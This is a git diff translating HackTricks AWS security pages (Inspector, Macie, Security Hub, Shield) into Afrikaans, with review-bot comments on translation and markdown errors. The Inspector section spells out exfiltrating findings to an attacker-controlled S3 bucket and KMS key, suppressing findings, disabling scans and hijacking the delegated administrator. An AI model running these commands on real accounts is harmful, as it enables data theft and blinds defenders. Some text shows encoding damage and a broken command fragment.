#### **Center for Internet Security (CIS) scans** -Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. +Amazon Inspector sluit CIS-skanderings in om Amazon EC2-instance bedryfstelsels teen beste praktyk aanbevelings van die Center for Internet Security (CIS) te benchmark. Hierdie skanderings verseker dat konfigurasies aan industrie-standaard sekuriteitsbaselines voldoen. -- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. -- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. -- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. +- **Konfigurasie**: CIS-skanderings evalueer of stelsels se konfigurasies aan spesifieke CIS Benchmark aanbevelings voldoen, met elke kontrole wat aan 'n CIS kontrole-ID en titel gekoppel is. +- **Uitvoering**: Skanderings word uitgevoer of geskeduleer op grond van instance-tags en gedefinieerde skedules. +- **Resultate**: Post-skanresultate dui aan watter kontroles geslaag het, oorgeslaan is, of gefaal het, wat insig bied in die sekuriteitsposisie van elke instance. ### Enumeration - ```bash # Administrator and member accounts # 
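Review bot: the ECR and Lambda bullets in this hunk contain mistranslations that change the meaning. In the Basic Scanning bullet, `jou bewaringe geskanteer word op druk` renders "repositories" as `bewaringe` (not a term for a registry repository), misspells `geskandeer` as `geskanteer`, and turns the technical term "on push" into `op druk`; keep `push` as the term (for example `by push`) and `repositories`/`bewaarplekke`. In the Lambda code scanning bullet, `hardgecodeerde akrediteer` does not mean "hardcoded credentials" (`akrediteer` is the verb "to accredit"); `hardgekodeerde geloofsbriewe` does, and `gedetecteerde` is the Dutch form of `opgespoorde`. Separately, the heading `### Enumeration` at the end of the hunk is left in English while the other headings in this file are translated; decide on one convention for section headings and apply it throughout.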
@@ -111,7 +110,7 @@ aws inspector2 list-findings aws inspector2 batch-get-finding-details --finding-arns ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this) aws inspector2 list-finding-aggregations --aggregation-type [--account-ids ] +| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids ] ## Retrieve code snippet information about one or more specified code vulnerability findings aws inspector2 batch-get-code-snippet --finding-arns ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this) 
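Review bot: the single added line in this hunk, `| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids ]`, is a fragment of the `--aggregation-type` value list that has been split onto its own line: it starts with a bare `|`, closes a `>` that is never opened on that line, and repeats `[--account-ids ]`, so the `aws inspector2 list-finding-aggregations` example no longer reads as one command. Keep the whole `--aggregation-type <...>` option list on the same line as the command and drop the stray continuation line; the surrounding `##` comments were not meant to be translated and are correctly untouched.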
@@ -183,113 +182,99 @@ aws inspector list-exclusions --assessment-run-arn ## Rule packages aws inspector list-rules-packages ``` - ### Post Exploitation > [!TIP] -> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. +> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om kwesbaarhede en netwerkblootstellings te vind wat hom kan help om ander instansies/tenks te kompromitteer. > -> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). +> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die slagoffer nie kwesbaarhede kan sien nie (alle of spesifieke). #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` -An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks. - +'n Aanvaller kan gedetailleerde verslae van kwesbaarhede of sagteware-bill of materials (SBOMs) genereer en dit uit jou AWS-omgewing uitvoer. Hierdie inligting kan benut word om spesifieke swakpunte, verouderde sagteware of onveilige afhanklikhede te identifiseer, wat gerigte aanvalle moontlik maak. ```bash # Findings report aws inspector2 create-findings-report --report-format --s3-destination [--filter-criteria ] # SBOM report aws inspector2 create-sbom-report --report-format --s3-destination [--resource-filter-criteria ] ``` - -The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key: - -1. 
**Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector: - +1. **Skep 'n Amazon S3-bucket** en heg 'n beleid daaraan sodat dit toeganklik is vanaf die slagoffer se Amazon Inspector: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "allow-inspector", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], - "Resource": "arn:aws:s3:::inspector-findings/*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - }, - "ArnLike": { - "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "allow-inspector", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], +"Resource": "arn:aws:s3:::inspector-findings/*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +}, +"ArnLike": { +"aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" +} +} +} +] } ``` - -2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector: - +2. **Skep 'n Amazon KMS-sleutel** en heg 'n beleid daaraan sodat dit deur die slagoffer se Amazon Inspector gebruik kan word: ```json { - "Version": "2012-10-17", - "Id": "key-policy", - "Statement": [ - { - ... - }, - { - "Sid": "Allow victim Amazon Inspector to use the key", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-policy", +"Statement": [ +{ +... 
+}, +{ +"Sid": "Allow victim Amazon Inspector to use the key", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +} +} +} +] } ``` - -3. Execute the command to **create the findings report** exfiltrating it: - +3. Voer die opdrag uit om **die bevindingsverslag te skep** deur dit te eksfiltreer: ```bash aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f ``` - -- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. +- **PotensiĂ«le Impak**: Generasie en eksfiltrasie van gedetailleerde kwesbaarheid en sagteware verslae, insig verkry in spesifieke kwesbaarhede en sekuriteits swakhede. #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` -An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues. - +'n Aanvaller kan die generasie van die gespesifiseerde bevindingsverslag of SBOM-verslag kanselleer, wat verhoed dat sekuriteitspanne tydige inligting oor kwesbaarhede en sagteware-bill of materials (SBOMs) ontvang, wat die opsporing en herstel van sekuriteitskwessies vertraag. 
```bash # Cancel findings report generation aws inspector2 cancel-findings-report --report-id # Cancel SBOM report generatiom aws inspector2 cancel-sbom-export --report-id ``` - -- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. +- **PotensiĂ«le Impak**: Ontwrichting van sekuriteitsmonitering en voorkoming van tydige opsporing en herstel van sekuriteitskwessies. #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` -An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response. - +'n Aanvaller met hierdie toestemmings sou in staat wees om die filterreĂ«ls te manipuleer wat bepaal watter kwesbaarhede en sekuriteitskwessies gerapporteer of onderdruk word (as die **aksie** op SUPPRESS gestel is, sou 'n onderdrukkingsreĂ«l geskep word). Dit kan kritieke kwesbaarhede van sekuriteitsadministrateurs verberg, wat dit makliker maak om hierdie swakhede sonder opsporing te benut. Deur belangrike filters te verander of te verwyder, kan 'n aanvaller ook geraas skep deur die stelsel met irrelevante bevindings te oorstroom, wat effektiewe sekuriteitsmonitering en -reaksie belemmer. ```bash # Create aws inspector2 create-filter --action --filter-criteria --name [--reason ] 
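Review bot: the lead-in sentence for the exfiltration walkthrough (`The following example shows how to exfiltrate all the Active findings from Amazon Inspector ...`) is removed in this hunk without a translated replacement, so steps 1 to 3 now start with no introduction; add the Afrikaans equivalent (for example `Die volgende voorbeeld wys hoe om al die Aktiewe bevindings ... te eksfiltreer:`) before `+1. **Skep 'n Amazon S3-bucket**`. The hunk also strips the blank lines between each numbered step and its fence and removes all indentation inside the two JSON policies; a column-0 fence directly after `1.`/`2.` closes the list item in CommonMark, so the policies no longer nest under their steps, and the flattened JSON is much harder to read. Keep the original blank lines and indentation. In the TIP block, `> egter, 'n aanvaller` starts the sentence in lower case (`> 'n Aanvaller kan egter ook ...`), and `instansies/tenks` renders "containers" as `tenks` (tanks) where the rest of this file uses `houer` (see `houerbeelde` in the ECR hunk).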
@@ -298,93 +283,78 @@ aws inspector2 update-filter --filter-arn [--action ] [ # Delete aws inspector2 delete-filter --arn ``` - -- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. +- **PotensiĂ«le Impak**: Verborge of onderdrukking van kritieke kwesbaarhede, of oorstroming van die stelsel met irrelevante bevindings. #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) -An attacker could significantly disrupt the security management structure. +'n Aanvaller kan die sekuriteitsbestuursstruktuur aansienlik ontwrig. -- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. -- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. +- Deur die gedelegeerde administrateurrekening te deaktiveer, kan die aanvaller die sekuriteitspan verhinder om toegang te verkry tot en die Amazon Inspector-instellings en -verslae te bestuur. +- Deur 'n ongeoorloofde administrateurrekening te aktiveer, kan 'n aanvaller sekuriteitskonfigurasies beheer, wat moontlik skandeer kan deaktiveer of instellings kan wysig om kwaadwillige aktiwiteite te verberg. > [!WARNING] -> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. +> Dit is vereis dat die ongeoorloofde rekening in dieselfde Organisasie as die slagoffer is om die gedelegeerde administrateur te word. 
> -> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** - +> Ten einde vir die ongeoorloofde rekening om die gedelegeerde administrateur te word, is dit ook vereis dat nadat die wettige gedelegeerde administrateur gedeaktiveer is, en voordat die ongeoorloofde rekening as die gedelegeerde administrateur geaktiveer word, die wettige administrateur van die organisasie as die gedelegeerde administrateur gederegistreer moet word. Dit kan gedoen word met die volgende opdrag (**`organizations:DeregisterDelegatedAdministrator`** toestemming vereis): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** ```bash # Disable aws inspector2 disable-delegated-admin-account --delegated-admin-account-id # Enable aws inspector2 enable-delegated-admin-account --delegated-admin-account-id ``` - -- **Potential Impact**: Disruption of the security management. +- **PotensiĂ«le Impak**: Ontwrichting van die sekuriteitsbestuur. #### `inspector2:AssociateMember`, `inspector2:DisassociateMember` -An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. 
This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. +'n Aanvaller kan die assosiasie van lid rekeninge binne 'n Amazon Inspector-organisasie manipuleer. Deur ongeoorloofde rekeninge te assosieer of legitieme ones te disassosieer, kan 'n aanvaller beheer oor watter rekeninge ingesluit word in sekuriteitskanderings en verslagdoening. Dit kan lei tot kritieke rekeninge wat uitgesluit word van sekuriteitsmonitering, wat die aanvaller in staat stel om kwesbaarhede in daardie rekeninge te benut sonder opsporing. > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> Hierdie aksie vereis dat dit deur die gedelegeerde administrateur uitgevoer word. ```bash # Associate aws inspector2 associate-member --account-id # Disassociate aws inspector2 disassociate-member --account-id ``` - -- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. +- **PotensiĂ«le Impak**: Uitsluiting van sleutelrekeninge uit sekuriteitsskande, wat onopgemerkte uitbuiting van kwesbaarhede moontlik maak. #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) -An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. 
+'n Aanvaller met die `inspector2:Disable` toestemming sou in staat wees om sekuriteitsskande op spesifieke hulpbron tipes (EC2, ECR, Lambda, Lambda kode) oor die gespesifiseerde rekeninge te deaktiveer, wat dele van die AWS omgewing onbeheerd en kwesbaar vir aanvalle laat. Daarbenewens, as gevolg van die **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller dan selektief skande heraktiveer om opsporing van verdagte konfigurasies te vermy. > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word. ```bash # Disable aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>] # Enable aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] ``` - -- **Potential Impact**: Creation of blind spots in the security monitoring. +- **PotensiĂ«le Impak**: Skepping van blinde kolle in die sekuriteitsmonitering. #### `inspector2:UpdateOrganizationConfiguration` -An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. +'n Aanvaller met hierdie toestemming sal in staat wees om die konfigurasies vir jou Amazon Inspector-organisasie op te dateer, wat die standaard skandeerfunksies wat vir nuwe lid rekeninge geaktiveer is, beĂŻnvloed. > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word. ```bash aws inspector2 update-organization-configuration --auto-enable ``` - -- **Potential Impact**: Alter security scan policies and configurations for the organization. +- **PotensiĂ«le Impak**: Verander sekuriteitskande-beleide en konfigurasies vir die organisasie. 
#### `inspector2:TagResource`, `inspector2:UntagResource` -An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity. - +'n Aanvaller kan etikette op AWS Inspector hulpbronne manipuleer, wat krities is vir die organiseer, opspoor en outomatiseer van sekuriteitsassessering. Deur etikette te verander of te verwyder, kan 'n aanvaller potensieel kwesbaarhede van sekuriteitskande verberg, nakomingsverslaggewing ontwrig, en inmeng met outomatiese herstelprosesse, wat lei tot onbeheerde sekuriteitskwessies en gecompromitteerde stelselintegriteit. ```bash aws inspector2 tag-resource --resource-arn --tags aws inspector2 untag-resource --resource-arn --tag-keys ``` +- **PotensiĂ«le Impak**: Versteeking van kwesbaarhede, ontwrigting van nakomingsverslagdoening, ontwrigting van sekuriteitsautomatisering en ontwrigting van koste-toewysing. -- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. - -## References +## Verwysings - [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - 
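Review bot: `skande` is used for "scans" throughout this hunk (`sekuriteitsskande`, `skande heraktiveer`, `sekuriteitskande-beleide`), but in Afrikaans `skande` means "shame/scandal"; earlier hunks in this file already use `skanderings`, so the `inspector2:AssociateMember`, `inspector2:Disable` and `inspector2:UpdateOrganizationConfiguration` paragraphs and impact bullets should use that. Other lines to fix: `legitieme ones te disassosieer` leaves the English word `ones` untranslated (`legitieme rekeninge`); `Verborge of onderdrukking van kritieke kwesbaarhede` uses an adjective where the noun `Verberging` is needed, and `Versteeking` in the TagResource impact bullet is not a word (also `Verberging`); `Ontwrichting` (here and in the CancelFindingsReport hunk) and `gecompromitteerde` are Dutch spellings of `Ontwrigting` and `gekompromitteerde`. The translated WARNING line keeps `[inspector2.amazonaws.com](http://inspector2.amazonaws.com/)` inside the backticked `aws organizations deregister-delegated-administrator` command; a markdown link inside a code span renders literally and the command fails if copied, so since the line is being rewritten anyway, use plain `inspector2.amazonaws.com`. Finally, `## References` becomes `## Verwysings` here while `### Post Exploitation` and `### Enumeration` stay English; pick one convention for headings.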
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md index e6e3a2281..1099dcb0f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md 
@@ -6,70 +6,69 @@ ## Macie -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. +Amazon Macie val uit as 'n diens wat ontwerp is om **outomaties data te ontdek, te klassifiseer en te identifiseer** binne 'n AWS-rekening. Dit benut **masjienleer** om data deurlopend te monitor en te analiseer, met die primĂȘre fokus op die opsporing en waarskuwing teen ongewone of verdagte aktiwiteite deur **cloud trail event** data en gebruikersgedragspatrone te ondersoek. -Key Features of Amazon Macie: +Belangrike Kenmerke van Amazon Macie: -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. +1. **Aktiewe Data-oorsig**: Maak gebruik van masjienleer om data aktief te hersien soos verskeie aksies binne die AWS-rekening plaasvind. +2. **Anomalie-opsporing**: Identifiseer onreĂ«lmatige aktiwiteite of toegangspatrone, wat waarskuwings genereer om potensiĂ«le data blootstellingsrisiko's te verminder. +3. 
**Deurlopende Monitering**: Monitor en ontdek outomaties nuwe data in Amazon S3, wat masjienleer en kunsmatige intelligensie benut om aan te pas by data toegangspatrone oor tyd. +4. **Data Klassifikasie met NLP**: Maak gebruik van natuurlike taalverwerking (NLP) om verskillende datatipes te klassifiseer en te interpreteer, en toekenning van risiko punte om bevindings te prioritiseer. +5. **Sekuriteitsmonitering**: Identifiseer sekuriteitsgevoelige data, insluitend API-sleutels, geheime sleutels, en persoonlike inligting, wat help om data lekke te voorkom. -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. +Amazon Macie is 'n **streekdiens** en vereis die 'AWSMacieServiceCustomerSetupRole' IAM Rol en 'n geaktiveerde AWS CloudTrail vir funksionaliteit. -### Alert System +### Waarskuwingstelsel -Macie categorizes alerts into predefined categories like: +Macie kategoriseer waarskuwings in vooraf gedefinieerde kategorieĂ« soos: -- Anonymized access -- Data compliance -- Credential Loss -- Privilege escalation +- Anonimiseerde toegang +- Data nakoming +- KredensiĂ«le verlies +- Privilege-eskalasie - Ransomware -- Suspicious access, etc. +- Verdachte toegang, ens. -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. +Hierdie waarskuwings bied gedetailleerde beskrywings en resultaatopbrekings vir effektiewe reaksie en oplossing. -### Dashboard Features +### Dashboard Kenmerke -The dashboard categorizes data into various sections, including: +Die dashboard kategoriseer data in verskeie afdelings, insluitend: -- S3 Objects (by time range, ACL, PII) -- High-risk CloudTrail events/users -- Activity Locations -- CloudTrail user identity types, and more. +- S3 Voorwerpe (volgens tydsbereik, ACL, PII) +- HoĂ« risiko CloudTrail gebeurtenisse/gebruikers +- Aktiwiteit Lokasies +- CloudTrail gebruikersidentiteitstipes, en meer. 
-### User Categorization +### Gebruiker Kategorisering -Users are classified into tiers based on the risk level of their API calls: +Gebruikers word geklassifiseer in vlakke gebaseer op die risiko vlak van hul API-oproepe: -- **Platinum**: High-risk API calls, often with admin privileges. -- **Gold**: Infrastructure-related API calls. -- **Silver**: Medium-risk API calls. -- **Bronze**: Low-risk API calls. +- **Platinum**: HoĂ« risiko API-oproepe, dikwels met admin regte. +- **Goud**: Infrastruktuur-verwante API-oproepe. +- **Silwer**: Medium risiko API-oproepe. +- **Brons**: Lae risiko API-oproepe. -### Identity Types +### Identiteitstipes -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. +Identiteitstipes sluit Root, IAM gebruiker, Aangenome Rol, Gefedereerde Gebruiker, AWS Rekening, en AWS Diens in, wat die bron van versoeke aandui. -### Data Classification +### Data Klassifikasie -Data classification encompasses: +Data klassifikasie sluit in: -- Content-Type: Based on detected content type. -- File Extension: Based on file extension. -- Theme: Categorized by keywords within files. -- Regex: Categorized based on specific regex patterns. +- Inhouds tipe: Gebaseer op die gedetecteerde inhoud tipe. +- LĂȘeruitbreiding: Gebaseer op lĂȘeruitbreiding. +- Tema: Gekategoriseer volgens sleutelwoorde binne lĂȘers. +- Regex: Gekategoriseer gebaseer op spesifieke regex patrone. -The highest risk among these categories determines the file's final risk level. +Die hoogste risiko onder hierdie kategorieĂ« bepaal die lĂȘer se finale risiko vlak. -### Research and Analysis +### Navorsing en Analise -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. 
Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. - -### Enumeration +Amazon Macie se navorsingsfunksie laat vir pasgemaakte navrae oor alle Macie data vir diepgaande analise. Filters sluit CloudTrail Data, S3 Emmer eienskappe, en S3 Voorwerpe in. Boonop ondersteun dit die uitnodiging van ander rekeninge om Amazon Macie te deel, wat samewerkende data bestuur en sekuriteitsmonitering fasiliteer. +### Enumerasie ``` # Get buckets aws macie2 describe-buckets @@ -102,21 +101,16 @@ aws macie2 list-classification-jobs aws macie2 list-classification-scopes aws macie2 list-custom-data-identifiers ``` - #### Post Exploitation > [!TIP] -> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. +> Vanuit 'n aanvaller se perspektief is hierdie diens nie gemaak om die aanvaller te ontdek nie, maar om sensitiewe inligting in die gestoor lĂȘers te ontdek. Daarom kan hierdie diens **'n aanvaller help om sensitiewe inligting** binne die emmers te vind.\ +> Dit is egter moontlik dat 'n aanvaller ook geĂŻnteresseerd kan wees om dit te ontwrig om te voorkom dat die slagoffer waarskuwings ontvang en daardie inligting makliker te steel. -TODO: PRs are welcome! +TODO: PRs is welkom! ## References - [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) {{#include ../../../../banners/hacktricks-training.md}} - - - - 
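Review bot: in the macie-enum.md hunk the alert category `+- Verdachte toegang, ens.` uses the Dutch spelling; Afrikaans is `Verdagte toegang`. The same hunk also strips the blank lines that separated the research paragraph from `### Enumerasie`, the closing code fence from `#### Post Exploitation` (the removed `-` blank line after the fence), and the heading from its fence; mdBook renders both forms, but keeping the blank lines leaves the source readable and the diff limited to translation changes. Several translated words show `Ă«` where `ë` is expected (`KredensiĂ«le verlies`, `HoĂ« risiko`, `kategorieĂ«`); if that is what the file contains rather than a display artifact, the text was double-encoded and needs to be re-saved as UTF-8 before merging.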
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md index 36dc8fbe9..1e7352495 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md @@ -4,24 +4,23 @@ ## Security Hub -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. +**Security Hub** versamel sekuriteits **data** van **verskeie AWS-rekeninge**, dienste, en ondersteunende derdepartyvennootprodukte en help jou om jou **sekuriteits** tendense te analiseer en die hoogste prioriteit sekuriteitskwessies te identifiseer. -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts +Dit **sentraliseer sekuriteitsverwante waarskuwings oor rekeninge**, en bied 'n UI om hierdie te sien. Die grootste beperking is dit **sentraliseer nie waarskuwings oor streke nie**, slegs oor rekeninge. -**Characteristics** +**Kenmerke** -- Regional (findings don't cross regions) -- Multi-account support -- Findings from: - - Guard Duty - - Config - - Inspector - - Macie - - third party - - self-generated against CIS standards +- Streeks (bevindinge kruis nie streke nie) +- Multi-rekening ondersteuning +- Bevindinge van: +- Guard Duty +- Config +- Inspector +- Macie +- derdeparty +- self-gegeneer teen CIS-standaarde ## Enumeration - ``` # Get basic info aws securityhub describe-hub 
@@ -50,18 +49,13 @@ aws securityhub list-automation-rules aws securityhub list-members aws securityhub get-members --account-ids ``` +## Om Ontdekking Te Omseil -## Bypass Detection +TODO, PRs aanvaar -TODO, PRs accepted - -## References +## Verwysings - [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) - [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md index b1df3003b..0583e0c8b 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md 
@@ -4,16 +4,12 @@ ## Shield -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. +AWS Shield is ontwerp om te help **beskerm jou infrastruktuur teen verspreide ontkenning van diens aanvalle**, algemeen bekend as DDoS. -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. +**AWS Shield Standard** is **gratis** vir almal, en dit bied **DDoS-beskerming** teen sommige van die meer algemene laag drie, die **netwerklaag**, en laag vier, **vervoerlaag**, DDoS aanvalle. Hierdie beskerming is geĂŻntegreer met beide CloudFront en Route 53. -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. +**AWS Shield advanced** bied 'n **groter vlak van beskerming** vir DDoS aanvalle oor 'n breĂ«r reeks AWS dienste teen 'n addisionele koste. Hierdie gevorderde vlak bied beskerming teen jou webtoepassings wat op EC2, CloudFront, ELB en ook Route 53 draai. Benewens hierdie addisionele hulpbronne wat beskerm word, is daar verbeterde vlakke van DDoS-beskerming wat aangebied word in vergelyking met die van Standard. En jy sal ook **toegang hĂȘ tot 'n 24-uur spesialiseerde DDoS reaksiespan by AWS, bekend as DRT**. 
